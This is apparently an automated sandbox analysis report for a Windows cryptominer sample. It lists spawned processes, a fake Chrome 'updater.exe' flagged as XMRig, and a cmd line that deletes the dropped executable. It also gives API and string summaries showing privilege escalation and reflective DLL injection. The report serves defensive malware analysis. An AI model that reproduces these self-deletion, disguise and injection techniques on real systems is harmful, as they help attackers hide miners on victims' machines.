Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	10:16:39
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	10:16:40
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	10:16:40
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	10:16:41
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Imagebase:	0x7ff7132e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:16:41
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:16:41
Start date:	09/10/2024
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x140000000
File size:	20'970'496 bytes
MD5 hash:	413E4E7BC129E8165D1FFD2B1AE5DB04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp, Author: unknown
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:16:42
Start date:	09/10/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff79b5e0000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:16:43
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	10:16:44
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	10:16:44
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	10:16:45
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	174
Start time:	10:16:49
Start date:	09/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	187
Start time:	10:16:49
Start date:	09/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF7C0DCAF46 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9f375889c9a6960dbf04f354147cad8e022b4cc17421845b018a4781f2386b
Instruction ID: ef65534a95c73456347d06f1b74d881bc3d29f3674d664fcb04210ecde751729
Opcode Fuzzy Hash: 7b9f375889c9a6960dbf04f354147cad8e022b4cc17421845b018a4781f2386b
Instruction Fuzzy Hash: 27F18330A08A8D8FEBA8EF28D8557E977D1FF55320F44427AE84DC7291DB34A9458BC1

Function 00007FF7C0DCBCF2 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64004ca6d6124a07cd1e89a00014b8a38716a95436f49ab2b9c5d6c18ef3f519
Instruction ID: b47177600a565ef3648287f4101fe8a8091421f87cb8f72bd01411cd47c7447a
Opcode Fuzzy Hash: 64004ca6d6124a07cd1e89a00014b8a38716a95436f49ab2b9c5d6c18ef3f519
Instruction Fuzzy Hash: A0E18130A08A4E8FEBA8EF28D8557E977D1EF54320F44427EE84DC7291DB74A9458BC1

Function 00007FF7C0DC5ADA Relevance: 1.8, Strings: 1, Instructions: 585COMMON

Download Yara Rule

Strings

#AL_^, xrefs: 00007FF7C0DC609B

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: #AL_^
API String ID: 0-570618886
Opcode ID: 0a1366b98a597a2fb51068017bc44b62a53f6bcece8372defe931035f01983b7
Instruction ID: 1962123289441860b04abef290603de45d3406ded17e09ff85e4191712d255d3
Opcode Fuzzy Hash: 0a1366b98a597a2fb51068017bc44b62a53f6bcece8372defe931035f01983b7
Instruction Fuzzy Hash: CD026220B289494FF749BB2884153B9ABD2EF99791FD401BAD00EC73D7DE197C8583A1

Function 00007FF7C0DCB906 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdf948d1f8ee9ff0193e5ff090337838269cac3d5799a4dcaab9ec4471a096a
Instruction ID: 61da89c395f92a30dce47692702362ad08fabb9da24cf9626bd95a87c6fdd064
Opcode Fuzzy Hash: 7bdf948d1f8ee9ff0193e5ff090337838269cac3d5799a4dcaab9ec4471a096a
Instruction Fuzzy Hash: 4DB1B330A08B8D4FDB68EF2898557E97BD1EF55320F44427AE84DC7292CB74A9458BC2

Function 00007FF7C0DC579B Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481cb426fe6c1ca9d34301a93a55b522f63ce009fddf4be30b527f4f4c934ccb
Instruction ID: 4c5470b478cdc42cd2157f270493f6f82ef56b0e65232b6f8a1a4de749e11670
Opcode Fuzzy Hash: 481cb426fe6c1ca9d34301a93a55b522f63ce009fddf4be30b527f4f4c934ccb
Instruction Fuzzy Hash: F4218F11E1D6860FEB07B77808652A97EA1AF56390B8501B7D08ECB2D7EE2D690443B2

Function 00007FF7C0DC5988 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad2aad6b4b5eef3cefe59b88cc73e4fd62d12dfc1a730216d61489ca4546aea
Instruction ID: a1801303e6a170da06f915b80639e543649f7217e1cdb33ec0b70f220f8c4374
Opcode Fuzzy Hash: 2ad2aad6b4b5eef3cefe59b88cc73e4fd62d12dfc1a730216d61489ca4546aea
Instruction Fuzzy Hash: 8721C334E08A4D4FEF45FB7884156EE7BB2FF69341F410176D009D7286EE39A90487A0

Function 00007FF7C0DC76A1 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ccee7877955cce65e03b098b95261cec58141520c797243fe08049b9d834d1c
Instruction ID: 7e421073b060031929ef506acfd3adbb1bfbfd96c2312c89000850128a170333
Opcode Fuzzy Hash: 1ccee7877955cce65e03b098b95261cec58141520c797243fe08049b9d834d1c
Instruction Fuzzy Hash: 80012662E1DD494FE78AA73C14592BC2B91FF952A038402B7C049C72D3DE1D698343D0

Function 00007FF7C0DCC450 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324e5290b5a76d2643e24bfe51a8a4ff3e73a58eb149d1a9790bfb76c1f2183c
Instruction ID: 2b50244504689e69fce3723f77496e1d4a1139ee51d39506d29e5c7d978cec95
Opcode Fuzzy Hash: 324e5290b5a76d2643e24bfe51a8a4ff3e73a58eb149d1a9790bfb76c1f2183c
Instruction Fuzzy Hash: 9A11C621E1D9464FF75AB63C28652B86BD2EF856B0B8802B6D448C73D7EE1C784243E1

Function 00007FF7C0DC75AD Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5514b88f37c06dbb1ac9c56d80be2e42fa65657b1f4c194f064c52fae981f8
Instruction ID: 58903e566a23db4b0e2b7611a2d5276a6ce609d8512a4b1c02ff2e8c2fe51c5f
Opcode Fuzzy Hash: 7c5514b88f37c06dbb1ac9c56d80be2e42fa65657b1f4c194f064c52fae981f8
Instruction Fuzzy Hash: B7117761E1D9854FE796BB3844163697B91EF4A290B9540B9C44DCB2E3FF1A3E0843E1

Function 00007FF7C0DC765B Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91c5c85f59aaf553bf71d96f0db4db0c6d402dc930dbdcdcb60a21a8142140e
Instruction ID: 201134485b6d176d14acc834f96d68a3077b0f383d104d590483525d4dc271e3
Opcode Fuzzy Hash: c91c5c85f59aaf553bf71d96f0db4db0c6d402dc930dbdcdcb60a21a8142140e
Instruction Fuzzy Hash: 10E0ED50D6D64609FA857A7845126B897819F563A4FC400B5D88DCB3D3EF0E3A4546F1

Non-executed Functions

Function 00007FF7C0DC0E6D Relevance: 2.9, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

5L_^, xrefs: 00007FF7C0DC0F01
3L_^, xrefs: 00007FF7C0DC1101

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: 3L_^$5L_^
API String ID: 0-1465517913
Opcode ID: 0ccbbdbbe68de33abf92277746d48d924aae1ba119cd891c1c1a5dfaf0e207dd
Instruction ID: 01163e7ef44a5a237ae0147314884f6ff24184471f648b972bfdd54de3a7b6f7
Opcode Fuzzy Hash: 0ccbbdbbe68de33abf92277746d48d924aae1ba119cd891c1c1a5dfaf0e207dd
Instruction Fuzzy Hash: 2FC1AF2BA0C56247F21376FD78422FD6F40DF423B5B484677E24C8A2939F28758692F6

Function 00007FF7C0DC0EFA Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

5L_^, xrefs: 00007FF7C0DC0F01

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: 5L_^
API String ID: 0-784440899
Opcode ID: 1064f84c584f66b2deae894f42c83917abfc6bf29e0edb2181d2ae498dbcad2d
Instruction ID: 554fafe6f405be6dd97341c8666fa595dc5b67fec72d450a3952a081f29bb20c
Opcode Fuzzy Hash: 1064f84c584f66b2deae894f42c83917abfc6bf29e0edb2181d2ae498dbcad2d
Instruction Fuzzy Hash: E7A1732BA0C52317F61276FD78422FDAF40DF423B5B488677E14C89283AF29758692F5

Function 00007FF7C0DC0ED3 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711078216.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0dc0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25089498de184202caf93db2bb45b365df991ddd7a5edf2dc2fb087cf8f8e7f2
Instruction ID: 8d86216aa64fc1c7357953205796d60e14aed9855e71648045e8905dc4f85de4
Opcode Fuzzy Hash: 25089498de184202caf93db2bb45b365df991ddd7a5edf2dc2fb087cf8f8e7f2
Instruction Fuzzy Hash: 8FA1512BA0C52217F61276FD7C422FDAF40DF423B5B488677E14C89283AF29758692F5

Analysis Process: dialer.exePID: 2788, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	47.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	39.1%
Total number of Nodes:	230
Total number of Limit Nodes:	23

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF723DE2328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF723DE2078: StrCpyW.SHLWAPI ref: 00007FF723DE20AA
Part of subcall function 00007FF723DE2078: StrCatW.SHLWAPI ref: 00007FF723DE20B8
Part of subcall function 00007FF723DE2078: GetModuleHandleW.KERNEL32 ref: 00007FF723DE20C1
Part of subcall function 00007FF723DE2078: GetCurrentProcess.KERNEL32 ref: 00007FF723DE210C
Part of subcall function 00007FF723DE2078: K32GetModuleInformation.KERNEL32 ref: 00007FF723DE2120
Part of subcall function 00007FF723DE2078: CreateFileW.KERNELBASE ref: 00007FF723DE2150
Part of subcall function 00007FF723DE2078: CreateFileMappingW.KERNELBASE ref: 00007FF723DE217B
Part of subcall function 00007FF723DE2078: MapViewOfFile.KERNELBASE ref: 00007FF723DE219F
Part of subcall function 00007FF723DE2078: lstrcmpiA.KERNEL32 ref: 00007FF723DE21EA
Part of subcall function 00007FF723DE2078: CloseHandle.KERNELBASE ref: 00007FF723DE2258
Part of subcall function 00007FF723DE2078: CloseHandle.KERNEL32 ref: 00007FF723DE2261
Part of subcall function 00007FF723DE2078: FreeLibrary.KERNEL32 ref: 00007FF723DE226A

VerSetConditionMask.NTDLL ref: 00007FF723DE2397
VerSetConditionMask.NTDLL ref: 00007FF723DE23A8
VerSetConditionMask.NTDLL ref: 00007FF723DE23B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF723DE23CC
GetCurrentProcessId.KERNEL32 ref: 00007FF723DE23DE
OpenProcess.KERNEL32 ref: 00007FF723DE23EE
OpenProcessToken.ADVAPI32 ref: 00007FF723DE240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF723DE2429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF723DE246D
GetLastError.KERNEL32 ref: 00007FF723DE2477
CloseHandle.KERNELBASE ref: 00007FF723DE2480
FindResourceExA.KERNEL32 ref: 00007FF723DE2494
SizeofResource.KERNEL32 ref: 00007FF723DE24AB
LoadResource.KERNEL32 ref: 00007FF723DE24C4
LockResource.KERNEL32 ref: 00007FF723DE24D6
GetCurrentProcessId.KERNEL32 ref: 00007FF723DE24E3
RegCreateKeyExW.KERNELBASE ref: 00007FF723DE2524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF723DE2557
RegSetKeySecurity.KERNELBASE ref: 00007FF723DE2574
LocalFree.KERNEL32 ref: 00007FF723DE2581
RegCreateKeyExW.KERNELBASE ref: 00007FF723DE25B9
GetCurrentProcessId.KERNEL32 ref: 00007FF723DE25C3
RegSetValueExW.KERNELBASE ref: 00007FF723DE25F1
RegCloseKey.KERNELBASE ref: 00007FF723DE25FC
RegCloseKey.ADVAPI32 ref: 00007FF723DE2607
CreateThread.KERNELBASE ref: 00007FF723DE2628
GetProcessHeap.KERNEL32 ref: 00007FF723DE262E
HeapAlloc.KERNEL32 ref: 00007FF723DE263D
CreateThread.KERNELBASE ref: 00007FF723DE266C
CreateThread.KERNELBASE ref: 00007FF723DE268D
SleepEx.KERNELBASE ref: 00007FF723DE2695

Strings

svc64, xrefs: 00007FF723DE25CE
ntdll.dll, xrefs: 00007FF723DE233B
kernel32.dll, xrefs: 00007FF723DE23D2
pid, xrefs: 00007FF723DE2596
DLL, xrefs: 00007FF723DE2486
SOFTWARE\dialerconfig, xrefs: 00007FF723DE24FF
SeDebugPrivilege, xrefs: 00007FF723DE2422
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF723DE2550

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction ID: 4eaa8a096843251f0ba5d1dcbf98d8b8e3d46fc865a161a6d7b8db6663f30e8c
Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction Fuzzy Hash: 78A12F35A18BC286E7A8AFA1EC443B9BBA1FB84745F804279D98D57764DF3CD148CB10

Function 00007FF723DE10C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF723DE19AC: OpenProcess.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19CA
Part of subcall function 00007FF723DE19AC: IsWow64Process.KERNEL32(?,?,?,00007FF723DE110E), ref: 00007FF723DE19E0
Part of subcall function 00007FF723DE19AC: CloseHandle.KERNELBASE(?,?,?,00007FF723DE110E), ref: 00007FF723DE19FB

OpenProcess.KERNEL32 ref: 00007FF723DE112C
OpenProcess.KERNEL32 ref: 00007FF723DE114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF723DE1170
PathFindFileNameW.SHLWAPI ref: 00007FF723DE117E
lstrlenW.KERNEL32 ref: 00007FF723DE118A
StrCpyW.SHLWAPI ref: 00007FF723DE11A1
CloseHandle.KERNEL32 ref: 00007FF723DE11AD
StrCmpIW.SHLWAPI ref: 00007FF723DE11ED
NtQueryInformationProcess.NTDLL ref: 00007FF723DE1221
OpenProcessToken.ADVAPI32 ref: 00007FF723DE124B
GetTokenInformation.KERNELBASE ref: 00007FF723DE1277
GetLastError.KERNEL32 ref: 00007FF723DE1281
LocalAlloc.KERNEL32 ref: 00007FF723DE1294
GetTokenInformation.KERNELBASE ref: 00007FF723DE12C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF723DE12CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF723DE12DC
LocalFree.KERNEL32 ref: 00007FF723DE12F4
CloseHandle.KERNEL32 ref: 00007FF723DE1308
StrStrA.SHLWAPI ref: 00007FF723DE13B2
VirtualAllocEx.KERNELBASE ref: 00007FF723DE1419
WriteProcessMemory.KERNELBASE ref: 00007FF723DE143C
WaitForSingleObject.KERNEL32 ref: 00007FF723DE1488
GetExitCodeThread.KERNEL32 ref: 00007FF723DE149E
CloseHandle.KERNELBASE ref: 00007FF723DE14B6
CloseHandle.KERNEL32 ref: 00007FF723DE14BF

Strings

ReflectiveDllMain, xrefs: 00007FF723DE13A8
MSBuild.exe, xrefs: 00007FF723DE11B8
dialer.exe, xrefs: 00007FF723DE11D8
WmiPrvSE.exe, xrefs: 00007FF723DE11CC
@, xrefs: 00007FF723DE140C

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: 9707558e58b9c789aeeb85b63d2521506aacf56e416ab109083752e06ffe1f52
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: 03B1A236B0868286EB9CAFA1DC40679BBA1FF44B84F804279CA4D63754DF3CE546CB10

Function 00007FF723DE14E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF723DE1517
HeapAlloc.KERNEL32 ref: 00007FF723DE152A
GetProcessHeap.KERNEL32 ref: 00007FF723DE1538
HeapAlloc.KERNEL32 ref: 00007FF723DE1549
K32EnumProcesses.KERNEL32 ref: 00007FF723DE1563
OpenProcess.KERNEL32 ref: 00007FF723DE1591
K32EnumProcessModules.KERNEL32 ref: 00007FF723DE15B6
ReadProcessMemory.KERNELBASE ref: 00007FF723DE15ED
CloseHandle.KERNELBASE ref: 00007FF723DE1629
GetProcessHeap.KERNEL32 ref: 00007FF723DE163B
HeapFree.KERNEL32 ref: 00007FF723DE1649
GetProcessHeap.KERNEL32 ref: 00007FF723DE164F
HeapFree.KERNEL32 ref: 00007FF723DE165D

Memory Dump Source

Source File: 00000016.00000002.1872166289.00007FF723DE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF723DE0000, based on PE: true

Associated: 00000016.00000002.1872105286.00007FF723DE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872243336.00007FF723DE3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000016.00000002.1872304320.00007FF723DE6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff723de0000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: 4b511114b57a1d92cacec796e5cdc541fcef34cabf0109fe86fdcf3bb26564b4
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: 4D51D632B146C247E798EFA2DC446B9AAA0FB45B84F844178DE4D27754DF3CD146CB10

Function 00007FF723DE1C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF723DE1CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF723DE1D14
LocalAlloc.KERNEL32 ref: 00007FF723DE1D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF723DE1D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF723DE1D52
CreateNamedPipeW.KERNELBASE ref: 00007FF723DE1D94

